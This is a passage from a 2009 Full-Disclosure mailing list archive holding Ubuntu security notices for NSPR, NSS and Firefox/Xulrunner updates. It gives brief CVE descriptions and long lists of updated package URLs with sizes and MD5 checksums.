http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.9.04.1_sparc.deb Size/MD5: 251874 4a70da68d8ae2e444b7aaf6836d50eba http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.9.04.1_sparc.deb Size/MD5: 17410 9921067423eeb95bea428bf9f471559c http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.9.04.1_sparc.deb Size/MD5: 301814 302527f9bbcb164d12b13d25719a9ab9 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090804/aa696b43/attachment.bin From jamie at canonical.com Tue Aug 4 23:00:59 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Tue, 4 Aug 2009 17:00:59 -0500 Subject: [Full-disclosure] [USN-810-2] NSPR update Message-ID: <20090804220059.GB18082@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-810-2 August 04, 2009 nspr update https://launchpad.net/bugs/387745 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libnspr4-0d 4.7.5-0ubuntu0.8.04.1 Ubuntu 8.10: libnspr4-0d 4.7.5-0ubuntu0.8.10.1 Ubuntu 9.04: libnspr4-0d 4.7.5-0ubuntu0.9.04.1 After a standard system upgrade you need to restart any applications that use NSPR, such as Firefox, to effect the necessary changes. Details follow: USN-810-1 fixed vulnerabilities in NSS. This update provides the NSPR needed to use the new NSS. Original advisory details: Moxie Marlinspike discovered that NSS did not properly handle regular expressions in certificate names. A remote attacker could create a specially crafted certificate to cause a denial of service (via application crash) or execute arbitrary code as the user invoking the program. (CVE-2009-2404) Moxie Marlinspike and Dan Kaminsky independently discovered that NSS did not properly handle certificates with NULL characters in the certificate name. An attacker could exploit this to perform a man in the middle attack to view sensitive information or alter encrypted communications. (CVE-2009-2408) Dan Kaminsky discovered NSS would still accept certificates with MD2 hash signatures. As a result, an attacker could potentially create a malicious trusted certificate to impersonate another site. (CVE-2009-2409) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5-0ubuntu0.8.04.1.diff.gz Size/MD5: 28600 f5f43fa3b9d3a04dbffb0ef9709ab280 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5-0ubuntu0.8.04.1.dsc Size/MD5: 1897 cf92002fb8cbfb273386db008bc89211 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5.orig.tar.gz Size/MD5: 1292677 f76d459a9e589d41d65314357a853783 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.04.1_amd64.deb Size/MD5: 287340 52cd782233986f6e9581c0796ce7910b http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.04.1_amd64.deb Size/MD5: 133030 19179d5f57e329a94da0a05f4fd7573c http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.04.1_amd64.deb Size/MD5: 272838 bc0196007756817734ebe7d2b87a8174 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.04.1_i386.deb Size/MD5: 279148 1a63f70ffc48b505bb0eeeebbd02b057 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.04.1_i386.deb Size/MD5: 121924 8a034208fd5fceccae0dc656cd34c068 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.04.1_i386.deb Size/MD5: 259376 961e2309b182b0a7bcd590e594fa1739 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.04.1_lpia.deb Size/MD5: 282284 4c60ef9d0a36c4ae3919f21ff2fb44fc http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.04.1_lpia.deb Size/MD5: 120356 d9e14f3ca957970653dea7c689978727 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.04.1_lpia.deb Size/MD5: 255030 95130f3868815b4900af62bb553d251f powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 288864 b51b9a1c6249691cd645304ea4fb9621 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 137250 9a239dbea8743626ae8642a4fdcebf52 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 266696 18bf93095bd95a1e0620b0493de4ad97 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.04.1_sparc.deb Size/MD5: 264952 b1028f1db41955f44c0d6f0e07187ee5 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.04.1_sparc.deb Size/MD5: 119080 1b2a624c52570dbe01d9e294346e90d5 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.04.1_sparc.deb Size/MD5: 254952 bd0583da8f3dca1041f69c3f549d80b5 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5-0ubuntu0.8.10.1.diff.gz Size/MD5: 28491 8834f389b484628a18e102188d5c7665 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5-0ubuntu0.8.10.1.dsc Size/MD5: 1897 97dfedceda1419df2257fc774c47a984 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5.orig.tar.gz Size/MD5: 1292677 f76d459a9e589d41d65314357a853783 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.10.1_amd64.deb Size/MD5: 299002 4e9566ba8e6ef664a7d2615ab167feb0 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.10.1_amd64.deb Size/MD5: 135022 7c75ef02983986004da0b9e7dade98c5 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.10.1_amd64.deb Size/MD5: 274444 927baa6dfd7ae6075589b04442f5d6a6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.10.1_i386.deb Size/MD5: 289110 a0e25f90449244c1446eb827a9c4cb39 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.10.1_i386.deb Size/MD5: 124698 c72513189f3683dc1ed08e75dd89e20e http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.10.1_i386.deb Size/MD5: 262034 8162a01064d4b65e5019596fcda7fc7a lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.10.1_lpia.deb Size/MD5: 293690 fcfe73ee99110af5f749cf8ae92b4d8d http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.10.1_lpia.deb Size/MD5: 122610 e28d9da522294e3d7d459a7d86528cfd http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.10.1_lpia.deb Size/MD5: 257476 fde686b087143379964a1c35e787fc57 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 300892 aad5920f4959ef255f48089bc93a3fbe http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 139818 64554ad09b1c86ccc1de1ba320f3762a http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 270372 c729bf5eea000659f680845ae6422f0f sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.8.10.1_sparc.deb Size/MD5: 274950 976e753f8780d59615f6f6f62f59574f http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.8.10.1_sparc.deb Size/MD5: 119878 707cae52c164a76b44cd92a955a50841 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.8.10.1_sparc.deb Size/MD5: 255590 23cd93eb4d321ad7aeb7bbd5d275d5e4 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5-0ubuntu0.9.04.1.diff.gz Size/MD5: 26576 f80bef0c81223bca073c69a2161e01c6 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5-0ubuntu0.9.04.1.dsc Size/MD5: 1897 7aeb5dc43aad09eec88e30b19956200a http://security.ubuntu.com/ubuntu/pool/main/n/nspr/nspr_4.7.5.orig.tar.gz Size/MD5: 1292677 f76d459a9e589d41d65314357a853783 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.9.04.1_amd64.deb Size/MD5: 299640 4231966ae422ae9034f53fe9a87ca374 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.9.04.1_amd64.deb Size/MD5: 136538 86d92ee8b171759788a9677fd7d77ef9 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.9.04.1_amd64.deb Size/MD5: 275612 78d4689f573a4a9394456872c4fd928d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.9.04.1_i386.deb Size/MD5: 289990 9888e6ac77563dbd7504557ddd33b4be http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.9.04.1_i386.deb Size/MD5: 126268 16a827cca1d160874869b7877dd1d542 http://security.ubuntu.com/ubuntu/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.9.04.1_i386.deb Size/MD5: 263208 181b6a6adc98e8dca59890ee4ee83de1 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.9.04.1_lpia.deb Size/MD5: 294318 f46216ed1d3803d7e35716fd279b92ae http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.9.04.1_lpia.deb Size/MD5: 124262 8a4732b18edf81700441511ac4274998 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.9.04.1_lpia.deb Size/MD5: 258582 b470aee3e87e3b673dde8380f064d9fb powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 301800 19cfebb4f279d80f81fc59d0ff6ef665 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 141394 afcd40f1c528c01735be1f0b6c059e58 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 271416 8263b766f3794c583d49c4fe873e3b5a sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d-dbg_4.7.5-0ubuntu0.9.04.1_sparc.deb Size/MD5: 275842 f09fa3c70ef849f11acbe05e52f56473 http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-0d_4.7.5-0ubuntu0.9.04.1_sparc.deb Size/MD5: 121354 f5d3853a01640fffbcd28610fa609c8e http://ports.ubuntu.com/pool/main/n/nspr/libnspr4-dev_4.7.5-0ubuntu0.9.04.1_sparc.deb Size/MD5: 256652 fa320131d8e8c22571cff5974a1e63eb -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090804/820c66b4/attachment.bin From jamie at canonical.com Wed Aug 5 03:34:16 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Tue, 4 Aug 2009 21:34:16 -0500 Subject: [Full-disclosure] [USN-811-1] Firefox and Xulrunner vulnerability Message-ID: <20090805023416.GA23061@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-811-1 August 05, 2009 firefox-3.0, xulrunner-1.9 vulnerability CVE-2009-2654 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: firefox-3.0 3.0.13+nobinonly-0ubuntu0.8.04.1 xulrunner-1.9 1.9.0.13+nobinonly-0ubuntu0.8.04.1 Ubuntu 8.10: abrowser 3.0.13+nobinonly-0ubuntu0.8.10.1 firefox-3.0 3.0.13+nobinonly-0ubuntu0.8.10.1 xulrunner-1.9 1.9.0.13+nobinonly-0ubuntu0.8.10.1 Ubuntu 9.04: abrowser 3.0.13+nobinonly-0ubuntu0.9.04.1 firefox-3.0 3.0.13+nobinonly-0ubuntu0.9.04.1 xulrunner-1.9 1.9.0.13+nobinonly-0ubuntu0.9.04.1 After a standard system upgrade you need to restart Firefox and any applications that use xulrunner, such as Epiphany, to effect the necessary changes. Details follow: Juan Pablo Lopez Yacubian discovered that Firefox did not properly display invalid URLs. If a user were tricked into accessing a malicious website, an attacker could exploit this to spoof the location bar, such as in a phishing attack. Furthermore, if the malicious website had a valid SSL certificate, Firefox would display the spoofed page as trusted. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 105936 4204b28b76c66e06d009e7d5a72a9021 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2732 94c9a58e1269eaa6b15e1fb4b28db2f4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly.orig.tar.gz Size/MD5: 11199029 5960200a1afdc601d9a8d9befaf4f196 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 79571 05e2fb17d72c87fd02768446c619541e http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2783 8020a06637c667c9ce89f3390fe3248a http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly.orig.tar.gz Size/MD5: 41914844 ec1fa36eac13668b99ae9fd4b4c597a4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66302 5e7ab9e931120be3ebd866823503c308 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66318 0f99976381de009543e65bdb4f633fdc http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66282 98ff18d54f323db7f4ab8473e01e124c http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66260 1651cecf483f67be30c00107198d1938 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66420 19b5912cd21cfc0eb13e2c4b8c4fbe72 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66326 273021e34baa1e0582f4638cb16ea7f1 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66278 08784b096290ed123db8c939f24ee221 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8964 aec3d4aab8c754bbe24c446220580704 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8962 bac29d3cfa35fa7f4c5d3986e17ad68a http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66300 4adc2db8653f09b964fd9c1e8596852c http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66268 51ba40dcbb7d6b8af61507ce2156cf39 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66258 5a2b9e1504f76a7fa5bdb4fbdaab8680 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8950 3cae452ca6632586c3312e8800bcf230 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66276 f8b9c047e8d8a55f1d0981563cdb7576 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8942 3aefb10ff3a18f821f611069fae53410 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 66252 cf1fb19e68b8b17391332a430711e65e http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 125864 7124683e75f335985b2c1342a933ad5b http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.13+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 235876 000b874b3ef482904060dcf4d04e60c4 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 9030 9211824a8f2c25aeaa33211dd867e549 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 29572 f2450ea4bac9da823f7f1355eb32c38e http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 1091498 93f43a66a6c2764fd426ed883c2fe2a7 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 4653866 41e4c012a101b2dc8ef6598b75a4caa0 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 48654 8bc41ba668899bb46ae247d0311a73d0 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 9080348 affc413097a0872751c5daedbfbf1208 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 9032 f843119c46d492a9769b226eaed47dfe http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 25730 fbdc0cf5eb67cef658e7144236009df8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 1070386 4b1ea99f7d29b31f53c7a065d201fa9a http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 4629888 2523739062c8d935fe80ba7457b59e3d http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 38508 8512d7515b610790139deec0d484c076 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 7804440 1d07377d2967c14d8ee6d45363d4ace6 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 9018 85c20706431d7bf7d60a600e1f825138 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 25338 6ed247585c4c0c3de191064eec42b8eb http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 1067292 809704da1076d6c831ed557d958cf98b http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 4625370 07cc4e325fa343830d2bfe0c55ca6e42 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 37602 bec6a1cb209d05e8598d29303f99e911 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.04.1_lpia.deb Size/MD5: 7695124 62b7f041a8f90597bcff1b922d17380c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 9026 f84f301a4f89abe7faf6dc64139e807e http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 27494 5ff3f69b049b09a44d2bc9714a164134 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 1084546 31bc83ae8be0bd7c9fa50c064fd0c18d http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 4621414 0f77fd8dc5e21be711e395b92b84553b http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 43680 4f1269d9378c987c0adb895685aa44da http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 8654790 aa169c16018dfc44fb82ea7385fa282f Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.10.1.diff.gz Size/MD5: 122980 824b06d99369938e373047db00fcef64 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.10.1.dsc Size/MD5: 2787 4fbb0233819676e6664624bb86df8271 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly.orig.tar.gz Size/MD5: 11199029 5960200a1afdc601d9a8d9befaf4f196 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.10.1.diff.gz Size/MD5: 251058 6e474ee8046a651338db1ce7bab09fd4 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.10.1.dsc Size/MD5: 2801 b42339bf7bf3fb411a0839ac99690111 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly.orig.tar.gz Size/MD5: 41914844 ec1fa36eac13668b99ae9fd4b4c597a4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69162 07a65516d8104341eb946796878347b5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69060 a6c9bdefa27d353fef856f7cda9a3b8a http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69068 d1c838162ae2dde4c3806857e65d7f46 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69040 477f931baefc659a2190a662d8b7d591 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69022 00da2e810f613ac0fcaca06c651a925b http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69152 45646ad96f63abd3925374bfea651266 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69086 4e8c57602439bfd796ab994b86255a99 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69034 727f1573402fbafb81e9530e627df37d http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8970 afd4be10c6fd6cd0a1e7fbe19bbcbbb9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8960 ad213194324c3eff090a72dc4d50ecd4 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69050 9e2e05caeb7fadccb8ecac0d7ee9b708 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69020 cbd20f53f3814573414779efbe0b0daf http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69012 6db17c7004ac63a23253c15ccc1824c0 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8946 